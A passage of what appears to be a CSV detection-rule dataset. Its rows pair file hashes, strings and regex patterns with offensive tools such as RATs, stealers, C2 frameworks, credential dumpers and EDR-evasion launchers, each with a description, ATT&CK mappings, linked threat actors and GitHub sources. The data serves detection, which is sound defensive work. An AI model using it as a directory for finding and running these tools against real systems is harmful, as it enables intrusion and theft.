TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","38083" "*cfafc9b2d6cbc65769074bab296c5fbacc676d298f7391a3ff787307eb1cbce0*",".{0,1000}cfafc9b2d6cbc65769074bab296c5fbacc676d298f7391a3ff787307eb1cbce0.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","38084" "*cfalta/PoshADCS*",".{0,1000}cfalta\/PoshADCS.{0,1000}","offensive_tool_keyword","PoshADCS","attack vectors against Active Directory by abusing Active Directory Certificate Services (ADCS)","T1213.003 - T1213 - T1098.003 - T1098 - T1484.001","TA0002 - TA0003 - TA0040","N/A","N/A","Persistence","https://github.com/cfalta/PoshADCS","1","1","N/A","N/A","7","2","186","17","2021-07-07T16:47:07Z","2019-10-15T15:54:03Z","38085" "*cfc253a8282a4065ff78c11a6495632991b2651e12203dbbb11bdb21bc2cb74f*",".{0,1000}cfc253a8282a4065ff78c11a6495632991b2651e12203dbbb11bdb21bc2cb74f.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#filehash","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","38088" "*cfcaca43f0d9b496ee8d45d9382492994b9c120a5d1cb0e51c23528a8ca4c171*",".{0,1000}cfcaca43f0d9b496ee8d45d9382492994b9c120a5d1cb0e51c23528a8ca4c171.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - 
TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","38090" "*cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de*",".{0,1000}cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","38091" "*cfcbf020d9a94c9ae6f255c3888bff4159e6521803ed993d64430ffc3c62e9be*",".{0,1000}cfcbf020d9a94c9ae6f255c3888bff4159e6521803ed993d64430ffc3c62e9be.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","38092" "*cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882*",".{0,1000}cfcdad4c34f652853a157b3f5bf9f8748b5f74963ca41f32632bbd755c250882.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38094" "*cfcf2478b9522b54a9af162dacde8a1b7618f808eb711ab6c1a44191bb044f31*",".{0,1000}cfcf2478b9522b54a9af162dacde8a1b7618f808eb711ab6c1a44191bb044f31.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","38096" "*cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f*",".{0,1000}cfd8565cb10640aa0710735a30291d6edb24f6a99af3704eb6bf1a016e83564f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38097" "*cfe2a0ee87618dc322a1f96521df4e51a5a81ba1d7e713e73ce8d3d0e9b712d0*",".{0,1000}cfe2a0ee87618dc322a1f96521df4e51a5a81ba1d7e713e73ce8d3d0e9b712d0.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","38099" 
"*cfe69a909f43c5734f180e5d0583d8f56d8f7a6cf87c36d43625d3bfa786e7ca*",".{0,1000}cfe69a909f43c5734f180e5d0583d8f56d8f7a6cf87c36d43625d3bfa786e7ca.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","38101" "*CFE81801-C2C5-4444-BE67-64EFFEFDCD73*",".{0,1000}CFE81801\-C2C5\-4444\-BE67\-64EFFEFDCD73.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","38102" "*cfed546b7f1d9d3e030bbb3f412c93b77672da5f5b6a513c7bd54328ca483387*",".{0,1000}cfed546b7f1d9d3e030bbb3f412c93b77672da5f5b6a513c7bd54328ca483387.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","38103" "*cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50*",".{0,1000}cfed7067c52715989de828850551ceb0e92a5f1f5389a81a025424a88ab77e50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","38104" "*cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8*",".{0,1000}cff5798485f1f260bed03c9f82572288df0dfd169fe1e448708d229fa8112ac8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","38105" "*cff5970b451b7b79d26b9d3aed274bec25920d0c6131ee22a3320dade7675498*",".{0,1000}cff5970b451b7b79d26b9d3aed274bec25920d0c6131ee22a3320dade7675498.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38106" "*cff8cdb2c3e117ad109d77b14d9449a9da9c9141a8b208a54479584d6e5389b6*",".{0,1000}cff8cdb2c3e117ad109d77b14d9449a9da9c9141a8b208a54479584d6e5389b6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","38107" "*cfprefsd_race_condition*",".{0,1000}cfprefsd_race_condition.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38109" "*cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ*",".{0,1000}cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAMQ.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","38110" "*cgeeodpfagjceefieflmdfphplkenlfk*",".{0,1000}cgeeodpfagjceefieflmdfphplkenlfk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38111" "*cGlpLmZkYS5nb3Y=*",".{0,1000}cGlpLmZkYS5nb3Y\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration 
simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","38112" "*cGlwZW5hbWU9*",".{0,1000}cGlwZW5hbWU9.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","N/A","10","10","916","138","2024-08-12T13:07:54Z","2019-03-31T14:23:57Z","38113" "*ch0sys/DUBrute*",".{0,1000}ch0sys\/DUBrute.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","1","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","38115" "*CH3CK70K3N(*",".{0,1000}CH3CK70K3N\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - 
TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38116" "*Chachi-Enumerator.ps1*",".{0,1000}Chachi\-Enumerator\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","38117" "*ChaitanyaHaritash/kimi*",".{0,1000}ChaitanyaHaritash\/kimi.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","38120" "*chameleon.py *",".{0,1000}chameleon\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38121" "*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","38122" 
"*change_sandbox_evasion_method(*",".{0,1000}change_sandbox_evasion_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","38123" "*change_shellcode_exec_method(*",".{0,1000}change_shellcode_exec_method\(.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","38124" "*changepasswd.py*",".{0,1000}changepasswd\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","38125" "*change-windows10-mac-address.py*",".{0,1000}change\-windows10\-mac\-address\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","38126" "*Changing NTLM credentials of current logon session *",".{0,1000}Changing\sNTLM\scredentials\sof\scurrent\slogon\ssession\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38127" "*Changing NTLM credentials of logon session *",".{0,1000}Changing\sNTLM\scredentials\sof\slogon\ssession\s.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - 
TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","38128" "*CHAOS (Remote Administration Tool)*",".{0,1000}CHAOS\s\(Remote\sAdministration\sTool\).{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","38130" "*chaos*persistence_enable*",".{0,1000}chaos.{0,1000}persistence_enable.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","38131" "*charlesnathansmith/whatlicense*",".{0,1000}charlesnathansmith\/whatlicense.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","38132" "*charles-proxy*",".{0,1000}charles\-proxy.{0,1000}","offensive_tool_keyword","charles-proxy","A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic","T1043.002 - T1556.001 - T1573.001","TA0012 - TA0017","N/A","N/A","Sniffing & Spoofing","https://charlesproxy.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38133" 
"*charlotte-main.zip*",".{0,1000}charlotte\-main\.zip.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","1","N/A","N/A","10","10","976","211","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z","38134" "*chatc46k7dqtvvrgfqjs6vxrwnmudko2ptiqvlb7doqxxqtjc22tsiad.onion*",".{0,1000}chatc46k7dqtvvrgfqjs6vxrwnmudko2ptiqvlb7doqxxqtjc22tsiad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38136" "*ChatLadon.exe*",".{0,1000}ChatLadon\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","38137" "*ChatLadon.rar*",".{0,1000}ChatLadon\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - 
Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","38138" "*chaudharyarjun/LooneyPwner*",".{0,1000}chaudharyarjun\/LooneyPwner.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/chaudharyarjun/LooneyPwner","1","1","#linux","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z","38144" "*check that our dll as been injected : NTHASH*",".{0,1000}check\sthat\sour\sdll\sas\sbeen\sinjected\s\:\sNTHASH.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","38145" "*check_and_write_IAT_Hook*",".{0,1000}check_and_write_IAT_Hook.{0,1000}","offensive_tool_keyword","cobaltstrike","A 